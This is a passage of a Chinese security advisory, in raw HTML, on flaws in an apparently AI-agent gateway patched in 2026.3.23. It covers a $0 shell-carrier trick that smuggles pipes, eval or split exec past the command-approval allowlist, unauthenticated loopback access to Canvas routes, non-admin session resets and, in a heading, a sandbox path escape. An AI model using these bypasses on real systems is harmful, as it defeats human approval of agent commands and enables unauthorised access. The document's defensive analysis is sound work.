border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">攻击场景</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：攻击者构造一个包含 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">$0</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 引用的 shell 命令，使其通过 exec approvals 的 allowlist 检查，但实际执行时携带额外的 shell 操作（如管道、eval、换行拆分的 exec）。旧版本的正则匹配过于宽松，无法区分合法的 positional carrier 与混杂恶意操作的 payload。</span></p><p data-line="142" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">技术根因</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/infra/exec-approvals-allowlist.ts</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）</span></p><p data-line="144" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">漏洞前态（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.22</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）：仅用宽松正则检查命令中是否包含 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">$0</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">，无法可靠区分真正的 direct carrier 与混杂恶意操作的 payload。</span></p><p data-line="146" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复后（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.23</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）：引入严格的 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">isDirectShellPositionalCarrierInvocation</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 函数，通过精确的正则模式只允许形如 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">$0 $@</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">、</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">exec -- $0 $@</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 的标准 positional carrier 形式命中 allowlist 绑定，其余形式一律拒绝。</span></p><p data-line="148" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复效果</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：拒绝 single-quoted 的 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">$0</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">/</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">$n</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> carrier 形式和换行拆分的 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">exec</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> carrier，只接受合法的 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">exec --</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> carrier 形式。</span></p><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="152" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">4.5 Canvas 匿名访问与非管理员 Session Reset</span></h3><p data-line="154" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">风险等级</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：高危  </span></p><p data-line="154" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">影响版本</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：version &lt;= </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.22</span></code></p><p data-line="157" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">攻击场景 A（Canvas 匿名访问）</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：攻击者通过本地回环地址或直连方式访问 Canvas 路由，旧版本将本地直连请求视为可信并直接放行，无需任何认证凭据。</span></p><p data-line="159" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">攻击场景 B（非管理员 Session Reset）</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：持有较低写权限的调用者发送 session reset/new 命令，旧版本不检查调用者是否具备 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">operator.admin</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> scope，导致任意低权限用户可重置他人会话。</span></p><p data-line="161" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">技术根因</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/gateway/server/http-auth.ts</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 和 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/gateway/server-methods/agent.ts</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）</span></p><p data-line="163" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">Canvas 路由漏洞前态：</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">isLocalDirectRequest</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 判断为本地直连时直接返回放行结果，绕过所有鉴权逻辑。</span></p><p data-line="165" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复后：删除&#34;本地直连即放行&#34;捷径，所有 Canvas 请求统一进入 bearer token / capability 鉴权链，路径格式异常时直接返回未授权。</span></p><p data-line="167" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">Session Reset 修复后：新增 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">resolveCanResetSessionFromClient</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 函数，将 reset/new 权限收归为仅 owner（即持有 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">operator.admin</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> scope 的调用者）可执行，并在命令处理路径中强制校验，权限不足时返回明确的缺少 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">operator.admin</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> scope 错误。</span></p><p data-line="169" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复效果</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：Canvas 路由必须经过完整鉴权链；session reset/new 被收归为 owner 专属操作，非 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">operator.admin</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 调用者会收到明确的权限不足错误。</span></p><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="173" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">4.6 沙箱媒体路径逃逸：</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 17.28px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">mediaUrl</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">/</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 